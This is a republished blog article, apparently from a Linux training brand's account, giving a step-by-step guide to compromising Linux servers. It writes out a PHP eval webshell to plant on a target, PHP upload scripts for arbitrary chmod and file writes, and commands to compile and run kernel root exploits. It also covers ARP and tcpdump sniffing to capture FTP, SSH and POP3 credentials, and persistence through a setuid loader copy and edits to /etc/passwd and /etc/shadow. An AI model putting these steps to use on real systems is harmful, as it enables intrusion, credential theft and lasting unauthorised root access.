BestHub
Sign in
Information Security 10 min read

Step-by-Step Guide to Deploying a PHP Backdoor and Gaining Root on Linux

This article walks through creating a simple PHP backdoor, using Python to spawn an interactive shell, compiling and exploiting local binaries, leveraging ARP sniffing to capture credentials, and applying various Linux privilege‑escalation techniques to obtain root access on vulnerable systems.

MaGe Linux Operations
MaGe Linux Operations
MaGe Linux Operations
Step-by-Step Guide to Deploying a PHP Backdoor and Gaining Root on Linux

Creating a PHP Backdoor

Use a one‑line PHP script that evaluates data from a POST parameter, e.g.: <?php @eval($_POST[md5])?> Save it as rankuplog_time.php on the target server.

Obtaining an Interactive Shell

Run Python’s pty module to spawn a /bin/sh shell: python -c 'import pty; pty.spawn("/bin/sh")' After execution, verify the user ID with id and kernel version with uname -r.

Linux Privilege‑Escalation Paths

Common vectors include third‑party software vulnerabilities, local trust features, and kernel overflows. Search for suitable exploits on sites such as tools.90sec.org, sebug.net, x73.cc, or exploit-db.com.

Compiling and Running Exploits

Upload source files (e.g., 2.c) to /tmp, compile with gcc -o 2 2.c, set executable permission ( chmod +x 2) and execute.

For ARP sniffing, install libpcap and libnet, then compile:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Run the sniffer with appropriate interface and target addresses.

Capturing Credentials

Use tcpdump to listen on the target host and write packets to a file, then analyze with Wireshark/Ethereal. Modify linsniffer.c to filter desired ports (FTP, SSH, POP3, etc.) and recompile.

Additional PHP Exploits

Upload a script that changes file permissions:

$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if ($ok) echo "CHMOD OK";

Or a script that writes arbitrary data to a file:

$filename = stripslashes($_POST['filename']);
$mess = stripslashes($_POST['mess']);
$fp = fopen($filename, 'a');
fputs($fp, $mess);
fclose($fp);

Kernel‑Based Local Root Exploits

Examples include the 2.6.19 udp_sendmsg exploit and udev privilege escalation for kernels 2.6.*. After compiling the exploit (e.g., pwnkernel.c), execute to obtain a root shell.

Post‑Exploitation: Installing a Persistent Backdoor

Copy /lib/ld-linux.so.2 to a writable location, set the set‑uid bit, and execute it to regain root privileges later.

Modify system files such as /etc/passwd, /etc/shadow, or use sed to replace the root UID for a new user.

Useful System Commands

ifconfig

– view network interfaces netstat -an | grep :80 – check listening ports service --status-all – list running services lsb_release -a – display distribution info sshd stop/start – control SSH daemon

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

network sniffing
MaGe Linux Operations
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment